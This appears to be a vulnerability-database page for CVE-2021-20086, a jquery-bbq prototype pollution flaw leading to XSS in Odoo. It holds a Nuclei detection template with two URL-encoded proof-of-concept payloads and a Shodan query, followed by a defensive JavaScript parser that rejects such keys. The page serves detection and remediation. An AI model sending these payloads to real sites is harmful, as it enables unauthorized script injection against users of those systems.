
Odoo Apps - Cross-Site Scripting via Prototype Pollution

CVE-2021-20086
Verified

Description

jquery-bbq 1.2.1 contains a prototype pollution vulnerability caused by improperly controlled modification of object prototype attributes, which lets malicious users inject properties into Object.prototype; exploitation requires malicious user interaction.

Severity

High

CVSS Score

8.8

Exploit Probability

30%

Affected Product

jquery-bbq

Published Date

October 8, 2025

Template Author

1337rokudenashi

CVE-2021-20086.yaml
id: CVE-2021-20086

info:
  name: Odoo Apps - Cross-Site Scripting via Prototype Pollution
  author: 1337rokudenashi
  severity: high
  description: |
    jquery-bbq 1.2.1 contains a prototype pollution caused by improperly controlled modification of object prototype attributes, letting malicious users inject properties into Object.prototype, exploit requires malicious user interaction.
  impact: |
    Attackers can modify Object.prototype, leading to potential security issues like property overwrites and application behavior manipulation.
  remediation: |
    Update to the latest version of jquery-bbq that addresses this vulnerability or apply patches to prevent prototype pollution.
  reference:
    - https://www.tenable.com/security/research/tra-2022-10
    - https://nvd.nist.gov/vuln/detail/CVE-2021-20086
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2021-20086
    cwe-id: CWE-1321
    epss-score: 0.30086
    epss-percentile: 0.96503
    cpe: cpe:2.3:a:jquery-bbq_project:jquery-bbq:1.2.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: jquery-bbq_project
    product: jquery-bbq
    shodan-query: html:"Odoo"
  tags: cve,cve2021,odoo,xss,proto,jquery,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/?__proto__%5Bcontext%5D=%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E&__proto__%5Bjquery%5D=x"
      - "{{BaseURL}}/?constructor%5Bprototype%5D%5Bcontext%5D=%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E&constructor%5Bprototype%5D%5Bjquery%5D=x"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - '!contains(body, "debug:")'
          - 'contains_all(body, "alert(document.domain)","var odoo =")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502207174e8ddd4ceedc32a4658d1521f0838db00181f43805368b9bb4b59ea77feaa022100fa9f0d16a86fd83fa97087cae22f19753411dd86d6efeb2b64f3084480ea4cbd:922c64590222798bb761d5b6d8e72950

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVE ID:
CVE-2021-20086
CWE ID:
CWE-1321

References

https://www.tenable.com/security/research/tra-2022-10
https://nvd.nist.gov/vuln/detail/CVE-2021-20086

Remediation Steps

Update to the latest version of jquery-bbq that addresses this vulnerability or apply patches to prevent prototype pollution.
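The template's two request paths show the shape of the problem: a bracketed query-string key such as `__proto__[context]` or `constructor[prototype][context]` is walked as an object path by a deparam-style parser, so the final assignment lands on Object.prototype. The following is an added example, written for this page and not code from the Nuclei template or from the jquery-bbq project, of a query-string parser in the deparam style that refuses to walk prototype-reaching segments and builds its containers without a prototype. The names `FORBIDDEN_KEYS`, `splitPath`, `safeDeparam` and `prototypeWasPolluted` are this example's own; the two query strings it is exercised with are the ones from the template above, and the remaining inputs are constructed.

```javascript
// Added example: a prototype-pollution-safe deparam-style parser.
// Not the jquery-bbq implementation; names below are this example's own.

// Path segments that would let an assignment escape the result object.
const FORBIDDEN_KEYS = new Set(["__proto__", "constructor", "prototype"]);

// Split "a[b][c]" into ["a", "b", "c"]; "tags[]" becomes ["tags", ""],
// where the empty trailing segment means "push onto an array".
// Returns null for keys that are not well-formed bracket paths.
function splitPath(key) {
  const m = /^([^[\]]*)((?:\[[^[\]]*\])*)$/.exec(key);
  if (!m) return null;
  const parts = [m[1]];
  const bracket = /\[([^[\]]*)\]/g;
  let seg;
  while ((seg = bracket.exec(m[2])) !== null) parts.push(seg[1]);
  return parts;
}

// Parse a query string into nested objects. Keys whose path contains a
// forbidden segment are dropped and reported instead of being assigned,
// and every container is created with Object.create(null) so that even a
// future parser bug could not reach Object.prototype through the result.
// Only the trailing "[]" array form is supported; nested array-of-object
// paths such as a[][b] are treated as plain object keys.
function safeDeparam(query) {
  const result = Object.create(null);
  const rejected = [];
  const raw = query.startsWith("?") ? query.slice(1) : query;
  // URLSearchParams percent-decodes keys, so "%5B" arrives as "[".
  for (const [rawKey, value] of new URLSearchParams(raw)) {
    const path = splitPath(rawKey);
    if (path === null || path.some((p) => FORBIDDEN_KEYS.has(p))) {
      rejected.push(rawKey);
      continue;
    }
    let cur = result;
    for (let i = 0; i < path.length - 1; i++) {
      const seg = path[i];
      // Create (or replace a scalar with) the container for this segment.
      if (cur[seg] === undefined || typeof cur[seg] !== "object") {
        cur[seg] = path[i + 1] === "" ? [] : Object.create(null);
      }
      cur = cur[seg];
    }
    const leaf = path[path.length - 1];
    if (leaf === "" && Array.isArray(cur)) cur.push(value);
    else cur[leaf] = value;
  }
  return { result, rejected };
}

// Post-condition check a test suite can run after parsing untrusted input:
// did any of the named properties appear on Object.prototype?
function prototypeWasPolluted(names) {
  return names.some((n) => Object.prototype.hasOwnProperty(n));
}

// Stand-alone run against the two query strings from the template above.
const TEMPLATE_QUERIES = [
  "?__proto__%5Bcontext%5D=%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E&__proto__%5Bjquery%5D=x",
  "?constructor%5Bprototype%5D%5Bcontext%5D=%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E&constructor%5Bprototype%5D%5Bjquery%5D=x",
];
for (const q of TEMPLATE_QUERIES) {
  const { result, rejected } = safeDeparam(q);
  console.log("kept:", Object.keys(result), "rejected:", rejected);
}
console.log("Object.prototype polluted:", prototypeWasPolluted(["context", "jquery"]));
```

The `rejected` list is the useful signal for a defender: logging it on the server side, or surfacing it from client-side code, turns a silent pollution attempt into a detectable event, while the prototype-less containers mean an assignment can never reach `Object.prototype` even if a segment check is missed.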